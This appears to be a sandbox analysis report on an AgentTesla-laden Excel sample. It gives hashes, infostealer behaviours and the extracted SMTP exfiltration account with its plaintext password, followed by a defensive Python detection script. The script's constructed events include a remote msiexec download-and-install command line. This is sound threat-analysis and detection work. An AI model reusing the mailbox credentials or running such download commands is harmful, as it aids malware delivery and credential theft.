General
-
Target
11203780.xls
-
Size
172KB
-
Sample
200630-qscm33xjcj
-
MD5
14b2d3f08ad6543c060d19748f526167
-
SHA1
b10646324228a4b21154ef6e7d9d5469a61364e7
-
SHA256
7c3822b0015e740bb3e9a1c4d0d5da368cae8117a820152377d41de49ff3ca36
-
SHA512
e800b1d0531a7e5931d6ad9e1cd48003e80d0f366e62f55e6dd17de5613bed9bd431ee40d0baa42e51389d30c1d9509a83e6878faa11f11d8e5745725035766b
Static task
static1
Behavioral task
behavioral1
Sample
11203780.xls
Resource
win7v200430
Behavioral task
behavioral2
Sample
11203780.xls
Resource
win10
Malware Config
Extracted
agenttesla
Protocol: smtp
Host: smtp.yandex.com
Port: 587
Username: pagejeffrey@yandex.com
Password: $44#@weC0*
Targets
-
Target
11203780.xls
-
Size
172KB
-
MD5
14b2d3f08ad6543c060d19748f526167
-
SHA1
b10646324228a4b21154ef6e7d9d5469a61364e7
-
SHA256
7c3822b0015e740bb3e9a1c4d0d5da368cae8117a820152377d41de49ff3ca36
-
SHA512
e800b1d0531a7e5931d6ad9e1cd48003e80d0f366e62f55e6dd17de5613bed9bd431ee40d0baa42e51389d30c1d9509a83e6878faa11f11d8e5745725035766b
Score 10/10
AgentTesla
Agent Tesla is a .NET (commonly Visual Basic .NET) infostealer and remote access tool (RAT). It harvests credentials from browsers, mail and FTP clients and exfiltrates them over SMTP, FTP or HTTP, which matches the SMTP account extracted from this sample above.
-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro; for an .xls sample the parent is the Excel process hosting the document.
-
AgentTesla Payload
-
Blocklisted process makes network request
-
Executes dropped EXE
-
Reads data files stored by FTP clients
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers
Infostealers often target stored browser data, which can include saved credentials etc.
-
Use of msiexec (install) with remote resource
msiexec can fetch and install an MSI package directly from an http(s) URL, so a document host launching it with a remote path is a download-and-execute stage.
-
Enumerates connected drives
Attempts to read the root path of hard drives other than the default C: drive.
-
Suspicious use of SetThreadContext
Commonly used for process hollowing (RunPE), where the payload is mapped into a suspended legitimate process and its thread is redirected to the injected entry point.
-
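The two behaviours above that are cheapest to hunt for on an endpoint are the document host launching msiexec with a remote package and a non-mail process talking to the SMTP submission host from the extracted config. The following is an added example, not part of the sandbox report, of that detection logic run over constructed process-creation and network events in a Sysmon-like shape; the event records, the parent/child paths and the msiexec URL (example.invalid) are made up for illustration, since the report does not show the actual command line.

```python
import re
from typing import Dict, List, Optional

# Document hosts: a child msiexec.exe from any of these is suspect (constructed list).
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
# Processes that are expected to speak SMTP submission (constructed allow-list).
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}
# Exfiltration endpoint taken from the AgentTesla config extracted on this page.
EXFIL_SMTP = {("smtp.yandex.com", 587)}

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, e.g. 'excel.exe'."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_remote_msiexec(ev: Dict) -> Optional[str]:
    """Flag msiexec.exe spawned by an Office process, loudest when it carries an http(s) package."""
    if ev.get("type") != "process" or basename(ev["image"]) != "msiexec.exe":
        return None
    parent = basename(ev["parent_image"])
    if parent not in OFFICE_PARENTS:
        return None
    if REMOTE_URL.search(ev.get("cmdline", "")):
        return f"office_spawned_remote_msiexec: {parent} -> {ev['cmdline']}"
    return f"office_spawned_msiexec: {parent} -> {ev['cmdline']}"


def detect_smtp_exfil(ev: Dict) -> Optional[str]:
    """Flag connections to the known exfil SMTP host from anything that is not a mail client."""
    if ev.get("type") != "network":
        return None
    key = (ev["dst_host"].lower(), int(ev["dst_port"]))
    if key not in EXFIL_SMTP:
        return None
    if basename(ev["image"]) in MAIL_CLIENTS:
        return None  # a mail client submitting mail to a mail server is expected
    return f"smtp_exfil_to_known_c2: {ev['image']} -> {key[0]}:{key[1]}"


def scan(events: List[Dict]) -> List[str]:
    """Run both rules over every event and return the alert strings in event order."""
    hits: List[str] = []
    for ev in events:
        for rule in (detect_remote_msiexec, detect_smtp_exfil):
            hit = rule(ev)
            if hit:
                hits.append(hit)
    return hits


# Constructed sample telemetry (not from the sandbox run).
SAMPLE_EVENTS = [
    {"type": "process", "pid": 1234, "ppid": 1000,
     "image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "cmdline": r"msiexec.exe /i http://example.invalid/pkg.msi /q"},
    {"type": "process", "pid": 2345, "ppid": 2000,          # benign local install
     "image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"msiexec.exe /i C:\Users\alice\Downloads\tool.msi /q"},
    {"type": "network", "pid": 3456,
     "image": r"C:\Users\alice\AppData\Roaming\update.exe",
     "dst_host": "smtp.yandex.com", "dst_port": 587},
    {"type": "network", "pid": 4567,                        # expected mail traffic
     "image": r"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE",
     "dst_host": "smtp.yandex.com", "dst_port": 587},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The msiexec rule still fires, at lower severity, when the package path is local, because Excel launching an installer at all is rarely legitimate; the SMTP rule keys only on the host and port, so it survives the operator rotating the mailbox credentials but needs the host list updated for each new config.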